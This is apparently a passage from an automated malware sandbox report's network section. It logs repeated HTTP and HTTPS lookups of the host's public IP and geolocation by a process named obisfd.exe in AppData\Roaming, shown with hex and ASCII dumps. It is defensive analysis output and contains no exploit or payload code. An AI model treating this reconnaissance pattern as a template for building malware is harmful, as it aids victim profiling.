                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.2249179132.226.8.169803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:10.374366045 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:56:11.797877073 CEST272INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:11 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.2249165188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:55:58 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-07 12:55:58 UTC686INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:58 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62093
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KI0ZL0NBQWIS9vCfvj8uA2Cd5GhsgQDnQ5xCA4hsMZP8%2FM1%2FFeM1gf6Zg3N%2FtzqpFFaCbCzcZjM1gLxExsNwgGouQT%2FmW%2F%2Bsn8%2FzfLonZ1fJ5CInBAd4cdu5r5jblVXpXiJOD%2FJu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0c701bca7c96-EWR
                                                                                          2024-10-07 12:55:58 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:55:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.2249166188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:55:59 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-07 12:55:59 UTC682INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:59 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62094
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpdWFNJ9e37ObuKfgD2dmM%2FCyjyz%2F2VnJEhapxYmWwCFG2c%2BIDjkEqhRQMqTdvw7uJVcZY%2FyJuO0NEEder4ObdJsWmI7fN0tA%2BKAICixh9IRqqZw1z8pHjgGbusnHrRG8zI54I7L"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0c753b66c335-EWR
                                                                                          2024-10-07 12:55:59 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:55:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.2249168188.114.97.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:02 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-07 12:56:02 UTC678INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:02 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62097
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=th9svKo%2FrDVHYXzSMwiYRXCUQzJFRFlD4zw5sQtjEa54Uf%2B2X%2FBISHoOFkd6kzO77mwL8CQwLBeDdN1keBNa%2F2d4hwHGwVzWxWkG6Bk9XRxEQkmkpMg5nR9ZsaCS3UgNKddoHKxh"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0c8778134211-EWR
                                                                                          2024-10-07 12:56:02 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.2249170188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:03 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-07 12:56:03 UTC680INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:03 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62098
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxF7DTeKmTcex%2BgiPDrLlC0qlCvuOpgSzjQ5CxGKz578lZP%2BXiqmE%2F7EsF%2Fg4tD8%2FjdTVogI7bsicK3c29aD8cwhn4xqoBmyAgnUg5y0Ix4PsEWGQXMvxPzzBB2rVHtkrjYqDnm7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0c8ed9e8de97-EWR
                                                                                          2024-10-07 12:56:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.2249172188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:04 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-07 12:56:04 UTC676INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:04 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62099
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJvxV5XH3Yie9u7XhLHJLSA27mSuA29tAxeLZgVZPZBJmV3hoGc0FMgFu1ScjZZ82DJJf%2FhaUiPiWbEzmx0FypuVuDqVAzjlHHtLoPZ9Ni3Ukx%2BGxEOsM4ybUk2oN4XaxPEuX%2BSz"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0c96dad87d18-EWR
                                                                                          2024-10-07 12:56:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.2249174188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:05 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-07 12:56:06 UTC686INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:06 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62101
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuGB3GFJsY73RDk1%2Fm1snHy6c5rr4zlS4%2Bl6H5omphbxr5MR7j6g3SNX2%2FXVnU2TDtZh4jtjdwmZQUcUsZKffScrOhq%2Btj8%2B%2B5N1NM70YemkvUZKjYBjXy6hzFQom59ZA%2B%2FeUB90"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0c9dfc4f425b-EWR
                                                                                          2024-10-07 12:56:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.2249176188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-07 12:56:08 UTC688INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:08 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62103
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xp3rSQvll%2FOT2%2BerqdWaiKS7qsBBsZSKnQ58Ny1zJnaHlxI%2BBuZIaapz%2BIu7gd%2Fko6SVQGfs1KNXMNH5Ax%2FKBWHpViiOyiqF3C%2Fk%2BVRzKc93O9Y8i4JQzEqo1a6CqdnseE%2FGOwxN"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0cae2e0141e3-EWR
                                                                                          2024-10-07 12:56:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.2249178188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-07 12:56:10 UTC686INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:10 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62105
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2Bt2AgUoG17TTcQFmM1dUUUpEpKw9%2BtQTlfwrOrE6K1mlrWGdkw0Xojg7VGHxXn%2F%2FVM3yRcdeSxp%2FsBT1Uk1%2B4e35pGQ91o0Zb6L4%2FnMMipMsxnMxbIxlHHdGCi%2BoIBF7GHAXYRe"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0cb829e142e2-EWR
                                                                                          2024-10-07 12:56:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                          2024-10-07 12:56:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.2249180188.114.96.34433628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-07 12:56:12 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-07 12:56:12 UTC684INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:12 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 62107
                                                                                          Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2BHp2dzWE8P5YcuZ26ApCeLYVPv4%2FLE9B%2Fb9PE0MUsrCbzL1NiWAqJ0MUvo5czcTxfv5%2B977N2iQTCti%2FGTE58u3dJrcQ643VCpifl4E3UH%2Bqkha7uMv96DrYLRUQpK9%2F8rO7rBZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cee0cc64cb942d0-EWR
                                                                                          2024-10-07 12:56:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
